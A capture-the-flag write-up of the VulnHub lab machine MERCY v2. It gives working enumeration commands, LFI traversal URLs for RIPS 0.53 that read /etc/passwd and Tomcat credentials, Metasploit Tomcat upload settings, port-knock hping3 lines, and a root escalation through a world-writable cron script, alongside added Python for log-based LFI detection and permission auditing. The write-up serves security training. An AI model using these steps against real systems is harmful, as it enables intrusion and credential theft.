MERCY v2 Writeup - VulnHub

Welcome to the writeup of MERCY, a machine dedicated to Offensive Security for the PWK course, and to a great friend of the author.

Pedro Mariano

Welcome to the writeup of MERCY v2, a machine that can be found on VulnHub.

Name: digitalworld.local: MERCY v2
Release date: 28 Dec 2018
Author: Donavan
Series: digitalworld.local
Description: MERCY is a machine dedicated to Offensive Security for the PWK course, and to a great friend of mine who was there to share my sufferance with me. :-)
MERCY is a name-play on some aspects of the PWK course. It is NOT a hint for the box.

This machine was deployed using VirtualBox with "Host-Only Adapter" configuration.


NMAP

nmap -v -sSV -p 22,53,80,110,139,143,445,993,995,8080 -Pn 192.168.56.101 -T4 -oA nmap/sSV
PORT STATE SERVICE VERSION
22/tcp filtered ssh
53/tcp open domain ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
80/tcp filtered http
110/tcp open pop3 Dovecot pop3d
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd (Ubuntu)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
995/tcp open ssl/pop3 Dovecot pop3d
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:A2:16:1C (Oracle VirtualBox virtual NIC)
Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Identified a web page on port 8080 (http://192.168.56.101:8080/) running Apache Tomcat.

Used the Gobuster tool to find some interesting directories:

GOBUSTER

gobuster dir -u http://192.168.56.101:8080/ -w /usr/share/wordlists/dirb/big.txt -e -s "200,301,302,401"
===============================================================
http://192.168.56.101:8080/docs (Status: 302) [Size: 0] [--> http://192.168.56.101:8080/docs/]
http://192.168.56.101:8080/examples (Status: 302) [Size: 0] [--> http://192.168.56.101:8080/examples/]
http://192.168.56.101:8080/manager (Status: 302) [Size: 0] [--> http://192.168.56.101:8080/manager/]
http://192.168.56.101:8080/robots.txt (Status: 200) [Size: 45]
===============================================================

The /robots.txt file pointed to the page /tryharder/tryharder, which contained a base64-encoded string that decodes to the following message:


It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.

Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.
No fluffy bunnies for those who set insecure passwords and endanger the enterprise.

At this point the finding didn't mean much yet... but every piece of information matters!

Continuing the enumeration, some shared folders were identified over SMB.


But there was nothing to retrieve as the "anonymous" user...

With the enum4linux tool it was possible to enumerate some users:

enum4linux -a 192.168.56.101
[...]
S-1-22-1-1000 Unix User\pleadformercy (Local User)
S-1-22-1-1001 Unix User\qiu (Local User)
S-1-22-1-1002 Unix User\thisisasuperduperlonguser (Local User)
S-1-22-1-1003 Unix User\fluffy (Local User)

The qiu user caught my attention because an SMB share with this name exists.

Following the "little poem" from /tryharder/tryharder (I think that warning didn't work, haha D:) I got access to qiu's SMB share using the following credentials:

qiu:password

And with that I managed to log into SMB and find some important folders and files.


After downloading the files and reading them I found a very useful piece of information in the .private/config file: a "port knocking" configuration that allows you to enable and disable the following ports: 22 and 80.


As the first scan showed, ports 22 and 80 were filtered. By knocking on the port sequences listed in .private/config, we can change the state of these ports and interact with them. Personally, I think it's a pretty cool feature.

hping3 was used to send the knock sequences:

hping3 -S -p 159 -c 1 192.168.56.101; hping3 -S -p 27391 -c 1 192.168.56.101; hping3 -S -p 4 -c 1 192.168.56.101
hping3 -S -p 17301 -c 1 192.168.56.101; hping3 -S -p 28504 -c 1 192.168.56.101; hping3 -S -p 9999 -c 1 192.168.56.101

After that, the ports were open.

nmap -v -sSV -p 22,80 -Pn 192.168.56.101 -T4 -oN nmap/sSV-APKnock
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 08:00:27:A2:16:1C (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
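To make the mechanism concrete, here is an added example (not code from the writeup or from the box) of how a knockd-style daemon matches a sequence: each source must hit the configured ports in order within a time window, and any out-of-order SYN or timeout resets its progress. The two sequences are assumed from the hping3 commands above (first triple opens 22/80, second closes them); the 10-second window and the SYN events are constructed.

```python
# Knock sequences assumed from the hping3 commands in the writeup (not read
# from the original .private/config): first triple opens 22/80, second closes.
OPEN_SEQ = (159, 27391, 4)
CLOSE_SEQ = (17301, 28504, 9999)


class KnockMatcher:
    """Per-source state machine in the style of knockd (simplified model).

    Each SYN advances a source one step through a sequence; a SYN to any
    other port, or taking longer than `timeout` seconds, resets progress.
    """

    def __init__(self, sequences, timeout=10.0):
        self.sequences = sequences          # {action: (port, port, ...)}
        self.timeout = timeout              # assumed window, not knockd's default
        self.progress = {}                  # (src, action) -> (next_idx, start_ts)

    def feed(self, src, dport, ts):
        """Process one SYN; return the action whose sequence just completed, else None."""
        fired = None
        for action, seq in self.sequences.items():
            idx, start = self.progress.get((src, action), (0, ts))
            if idx and ts - start > self.timeout:
                idx = 0                     # too slow: the partial knock expires
            if dport == seq[idx]:
                if idx == 0:
                    start = ts              # first knock opens the window
                idx += 1
                if idx == len(seq):
                    fired, idx = action, 0
                self.progress[(src, action)] = (idx, start)
            else:
                self.progress[(src, action)] = (0, ts)  # out-of-sequence SYN resets
        return fired


def demo():
    """Replay constructed SYN events (src, dst port, seconds) through the matcher."""
    m = KnockMatcher({"open_22_80": OPEN_SEQ, "close_22_80": CLOSE_SEQ})
    events = [
        ("192.168.56.104", 159, 0.0), ("192.168.56.104", 27391, 0.5),
        ("192.168.56.104", 4, 1.0),                                  # completes open
        ("192.168.56.105", 159, 2.0), ("192.168.56.105", 8080, 2.5),  # stray SYN resets
        ("192.168.56.105", 27391, 3.0), ("192.168.56.105", 4, 3.5),   # no action
        ("192.168.56.104", 17301, 4.0), ("192.168.56.104", 28504, 20.0),  # too slow
        ("192.168.56.104", 9999, 20.5),
    ]
    fired = []
    for src, dport, ts in events:
        action = m.feed(src, dport, ts)
        if action:
            fired.append((src, action))
    return fired
```

The scan host that interleaves a SYN to 8080 never opens the ports, which is why a knock sequence is not discoverable by an ordinary port scan.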

Accessing the web page on port 80, a loving message is displayed o.o


Running Gobuster again, I found two interesting pages:

gobuster dir -u http://192.168.56.101/ -w /usr/share/wordlists/dirb/big.txt -e -s "200,301,302,401"
===============================================================
http://192.168.56.101/.htpasswd (Status: 403) [Size: 290]
http://192.168.56.101/.htaccess (Status: 403) [Size: 290]
http://192.168.56.101/robots.txt (Status: 200) [Size: 50]
http://192.168.56.101/server-status (Status: 403) [Size: 294]
http://192.168.56.101/time (Status: 200) [Size: 79]
===============================================================

Below are the pages found:

  • /time

Is this information pulled directly from the system?

  • /robots.txt

As we can see in /robots.txt, there are two more pages:

  • /mercy
  • /nomercy

The latter is RIPS, a "static source code analyser for vulnerabilities in PHP web applications"; version 0.53 has a public exploit for its "Multiple Local File Inclusions" vulnerability.

Through this vulnerability I read the /etc/passwd file, confirming the LFI and, while at it, the existing users :p

http://192.168.56.101/nomercy/windows/code.php?file=../../../../../../../etc/passwd

As identified at the beginning, there is a Tomcat server, and its default index page reveals the installation path. The LFI was then used to read the Tomcat credentials, which are normally stored in the file tomcat-users.xml.

http://192.168.56.101/nomercy/windows/code.php?file=../../../../../var/lib/tomcat7/conf/tomcat-users.xml
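From the defender's side, requests like the two above leave an unmistakable trace in the web server's access log. The following added example (mine, not from the writeup or from RIPS) flags traversal and sensitive-file reads in query parameters, including percent-encoded and double-encoded variants; the log lines are constructed to mirror the requests on this page.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache access-log lines modelled on the requests above; not real box logs.
SAMPLE_LOG = """\
192.168.56.104 - - [28/Dec/2018:10:00:01 +0000] "GET /nomercy/index.php HTTP/1.1" 200 1532
192.168.56.104 - - [28/Dec/2018:10:00:07 +0000] "GET /nomercy/windows/code.php?file=../../../../../../../etc/passwd HTTP/1.1" 200 2201
192.168.56.104 - - [28/Dec/2018:10:00:12 +0000] "GET /nomercy/windows/code.php?file=..%2f..%2f..%2f..%2fvar/lib/tomcat7/conf/tomcat-users.xml HTTP/1.1" 200 980
192.168.56.104 - - [28/Dec/2018:10:00:20 +0000] "GET /nomercy/windows/code.php?file=%252e%252e/%252e%252e/etc/shadow HTTP/1.1" 403 290
192.168.56.104 - - [28/Dec/2018:10:00:25 +0000] "GET /time HTTP/1.1" 200 79
"""

REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")
SENSITIVE = ("/etc/passwd", "/etc/shadow", "tomcat-users.xml")


def decode(value, rounds=2):
    """Percent-decode repeatedly so double-encoded traversal (%252e%252e) is caught."""
    for _ in range(rounds):
        value = unquote(value)
    return value


def analyse(line):
    """Return a finding for a traversal/LFI-looking request, or None for a clean line."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    findings = []
    # parse_qsl already percent-decodes once; decode() handles further layers
    for key, raw in parse_qsl(url.query, keep_blank_values=True):
        value = decode(raw)
        if TRAVERSAL_RE.search(value):
            findings.append(f"traversal in param {key!r}")
        if any(s in value for s in SENSITIVE):
            findings.append(f"sensitive path in param {key!r}")
    if not findings:
        return None
    return {"src": m.group("src"), "path": url.path,
            "status": int(m.group("status")), "findings": findings}


def scan(log_text):
    """Run analyse() over every line and keep the hits."""
    return [f for f in map(analyse, log_text.splitlines()) if f]
```

Note that the 403 on the shadow request is still worth alerting on: the status tells you the read failed, the pattern tells you someone is probing.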

With these credentials I logged into the Tomcat Manager as an administrator; with these permissions it's possible to upload and edit everything.


To get a reverse shell we could use the upload function in Tomcat Manager, but Metasploit offers an easier way...

The exploit/multi/http/tomcat_mgr_upload module was used to exploit the server and establish a reverse shell.

set HttpPassword heartbreakisinevitable
set HttpUsername thisisasuperduperlonguser
set RHOSTS 192.168.56.101
set RPORT 8080
set LHOST 192.168.56.104


Spoiler: thisisasuperduperlonguser's home directory is a troll D:


Privilege Escalation

There weren't many leads besides some users' /home directories, but the credentials found in tomcat-users.xml worked to switch to the fluffy user (fluffy:freakishfluffybunny). An interactive shell was needed for that, and Python was used to spawn one.


Now, as the fluffy user, there are secrets and interesting things in the home directory: ~/.private/secrets

fluffy@MERCY:~/.private/secrets$ ls -la
ls -la
total 20
drwxr-xr-x 2 fluffy fluffy 4096 Nov 20 2018 .
drwxr-xr-x 3 fluffy fluffy 4096 Nov 20 2018 ..
-rwxr-xr-x 1 fluffy fluffy 37 Nov 20 2018 backup.save
-rw-r--r-- 1 fluffy fluffy 12 Nov 20 2018 .secrets
-rwxrwxrwx 1 root root 222 Nov 20 2018 timeclock
fluffy@MERCY:~/.private/secrets$ cat timeclock
cat timeclock
#!/bin/bash
now=$(date)
echo "The system time is: $now." > ../../../../../var/www/html/time
echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time
chown www-data:www-data ../../../../../var/www/html/time

The content of the timeclock file matches the /time page we saw earlier, so it appears to run automatically; it is owned by root and has full permissions (rwxrwxrwx)... interesting, isn't it?
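The root cause here is a script executed by root that a lower-privileged user can modify. This added example (mine, not from the writeup) audits a script path for exactly that class of mistake and recreates the timeclock situation in a temporary directory beside a 0755 copy. It also checks the parent directory: in the listing above the directory is owned by fluffy, so the root-owned file could have been replaced even if it were not world-writable. The trusted uid is set to the current user in the demo so that only the permission bits drive the verdict.

```python
import os
import stat
import tempfile


def audit_root_script(path, trusted_uid=0):
    """Return the set of reasons a script run by root from `path` cannot be trusted.

    Covers the timeclock-style mistakes: the file can be modified by other
    users, or it lives in a directory where another user can replace it
    regardless of the file's own mode bits.
    """
    findings = set()
    st = os.stat(path)
    if st.st_mode & stat.S_IWOTH:
        findings.add("script is world-writable")
    if st.st_mode & stat.S_IWGRP:
        findings.add("script is group-writable")
    if st.st_uid != trusted_uid:
        findings.add("script is not owned by the trusted uid")
    parent = os.path.dirname(os.path.abspath(path))
    pst = os.stat(parent)
    if pst.st_uid != trusted_uid:
        findings.add("parent directory owned by another user (file can be replaced)")
    if pst.st_mode & (stat.S_IWOTH | stat.S_IWGRP) and not pst.st_mode & stat.S_ISVTX:
        findings.add("parent directory writable by others (file can be replaced)")
    return findings


def demo():
    """Recreate a 0777 timeclock next to a 0755 copy in a temp dir and audit both."""
    body = '#!/bin/bash\nnow=$(date)\necho "The system time is: $now." > /var/www/html/time\n'
    with tempfile.TemporaryDirectory() as d:      # created 0700, owned by us
        bad = os.path.join(d, "timeclock")
        good = os.path.join(d, "timeclock.fixed")
        for p, mode in ((bad, 0o777), (good, 0o755)):
            with open(p, "w") as f:
                f.write(body)
            os.chmod(p, mode)
        # trusted_uid = our own uid, so only the permission bits decide the verdict here
        me = os.getuid()
        return {"timeclock": audit_root_script(bad, me),
                "fixed": audit_root_script(good, me)}
```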

So a bash command was added to the file to establish a reverse shell back to my machine.


Before that, netcat was set listening on port 6666 to wait for the connection.

After netcat was configured and the file changed, the script ran again and the reverse shell was successfully established.


NICE! PWNED!!

Finally we got root, and the whole machine is compromised!


Conclusion

This is a really good machine to practice some basic skills, and it can still make you beg for MERCY xD. I recommend you download it and try it too o/ if you haven't already...

And of course, I couldn't leave out the author's notes found in the /root directory, the author-secret.txt and proof.txt files.

root@MERCY:~# cat author-secret.txt
cat author-secret.txt
Hi! Congratulations on being able to root MERCY.
The author feels bittersweet about this box. On one hand, it was a box designed as a dedication to the sufferance put through by the Offensive Security team for PWK. I thought I would pay it forward by creating a vulnerable machine too. This is not meant to be a particularly difficult machine, but is meant to bring you through a good number of enumerative steps through a variety of techniques.
The author would also like to thank a great friend who he always teases as "plead for mercy". She has been awesome. The author, in particular, appreciates her great heart, candour, and her willingness to listen to the author's rants and troubles. The author will stay forever grateful for her presence. She never needed to be this friendly to the author.
The author, as "plead for mercy" knows, is terrible at any sort of dedication or gifting, and so the best the author could do, I guess, is a little present, which explains the hostname of this box. (You might also have been pleading for mercy trying to root this box, considering its design.)
You'll always be remembered, "plead for mercy", and Offensive Security, for making me plead for mercy!
Congratulations, once again, for you TRIED HARDER!
Regards,
The Author
root@MERCY:~# cat proof.txt
cat proof.txt
Congratulations on rooting MERCY. :-)

Thanks for reading and feel free to pingback a coffee ;D